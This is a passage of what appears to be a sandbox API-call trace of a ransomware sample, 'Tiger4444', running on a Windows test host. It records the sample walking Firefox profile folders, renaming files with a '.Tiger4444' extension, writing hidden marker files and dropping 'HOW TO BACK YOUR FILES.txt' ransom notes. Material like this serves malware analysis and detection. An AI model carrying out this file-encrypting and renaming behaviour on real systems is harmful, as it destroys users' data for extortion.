(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\store.json.mozlz4.tiger4444"), dwFlags=0x1) returned 1 [0051.800] FindNextFileW (in: hFindFile=0xc73088, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2923a75e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x2923a75e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x2923a75e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="store.json.mozlz4", cAlternateFileName="STOREJ~1.MOZ")) returned 0 [0051.800] FindClose (in: hFindFile=0xc73088 | out: hFindFile=0xc73088) returned 1 [0051.800] lstrcpyW (in: lpString1=0x30aeb4c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.800] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.802] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.802] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.803] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.803] CloseHandle (hObject=0x2c8) returned 1 [0051.803] CloseHandle (hObject=0x2ac) returned 1 [0051.804] GetCurrentThreadId () returned 0xfa8 [0051.804] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0051.804] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events" [0051.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73f50 | out: hHeap=0xc50000) returned 1 [0051.804] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0051.804] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events" [0051.804] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\" [0051.804] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\.BFC0E91B00AE8A0620D3" [0051.804] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\events\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.805] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.807] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.809] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.809] CloseHandle (hObject=0x2ac) returned 1 [0051.809] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events") returned 88 [0051.809] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.809] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83e689de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0051.809] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.810] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.810] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.810] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.810] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb00785a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfb00785a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83e689de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.810] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.810] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.810] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.810] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.810] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.810] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83e689de, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83e689de, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83e689de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.810] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.810] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.810] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83e689de, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83e689de, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83e689de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.810] FindClose (in: hFindFile=0xc72d48 | out: hFindFile=0xc72d48) returned 1 [0051.810] lstrcpyW (in: lpString1=0x30aeb5a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.810] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\crashes\\events\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\crashes\\events\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.810] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.810] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.811] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.811] CloseHandle (hObject=0x2c8) returned 1 [0051.811] CloseHandle (hObject=0x2ac) returned 1 [0051.811] GetCurrentThreadId () returned 0xfa8 [0051.811] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc663a8 [0051.811] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups" [0051.811] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7a2e8 | out: hHeap=0xc50000) returned 1 [0051.811] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc663a0 | out: hHeap=0xc50000) returned 1 [0051.811] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups" [0051.811] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\" [0051.811] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\.BFC0E91B00AE8A0620D3" [0051.811] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\bookmarkbackups\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.812] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.814] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.815] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.815] CloseHandle (hObject=0x2ac) returned 1 [0051.816] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups") returned 89 [0051.816] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.816] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe9b352a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe9b352a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83e689de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73248 [0051.816] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.816] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.816] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.816] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.816] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe9b352a, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe9b352a, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83e689de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.816] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.816] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.816] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.816] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.816] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.816] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83e689de, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83e689de, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83e689de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.816] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.816] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.816] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83e689de, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83e689de, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83e689de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.816] FindClose (in: hFindFile=0xc73248 | out: hFindFile=0xc73248) returned 1 [0051.817] lstrcpyW (in: lpString1=0x30aeb5c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.817] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\bookmarkbackups\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\bookmarkbackups\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.817] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.817] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.817] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.818] CloseHandle (hObject=0x2c8) returned 1 [0051.818] CloseHandle (hObject=0x2ac) returned 1 [0051.818] GetCurrentThreadId () returned 0xfa8 [0051.818] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66328 [0051.818] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings" [0051.818] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0051.818] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66320 | out: hHeap=0xc50000) returned 1 [0051.818] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings" [0051.818] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\" [0051.818] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\.BFC0E91B00AE8A0620D3" [0051.818] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\pending pings\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0051.819] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0051.823] FlushFileBuffers (hFile=0x2ac) returned 1 [0051.824] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0051.824] CloseHandle (hObject=0x2ac) returned 1 [0051.825] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings") returned 61 [0051.825] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0051.825] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83e8e9d2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73208 [0051.825] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.825] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.825] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0051.825] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0051.825] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfafe15e1, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x83e8e9d2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0051.826] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.826] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0051.826] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0051.826] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0051.826] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0051.826] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83e8e9d2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83e8e9d2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83e8e9d2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0051.826] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0051.826] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0051.826] FindNextFileW (in: hFindFile=0xc73208, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x83e8e9d2, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x83e8e9d2, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x83e8e9d2, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0051.826] FindClose (in: hFindFile=0xc73208 | out: hFindFile=0xc73208) returned 1 [0051.826] lstrcpyW (in: lpString1=0x30aeb24, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0051.826] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Pending Pings\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\pending pings\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0051.826] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2c8 [0051.827] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0051.827] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.827] CloseHandle (hObject=0x2c8) returned 1 [0051.827] CloseHandle (hObject=0x2ac) returned 1 [0051.827] GetCurrentThreadId () returned 0xfa8 [0051.827] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66528 [0051.828] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports", iMaxLength=2048 | out: 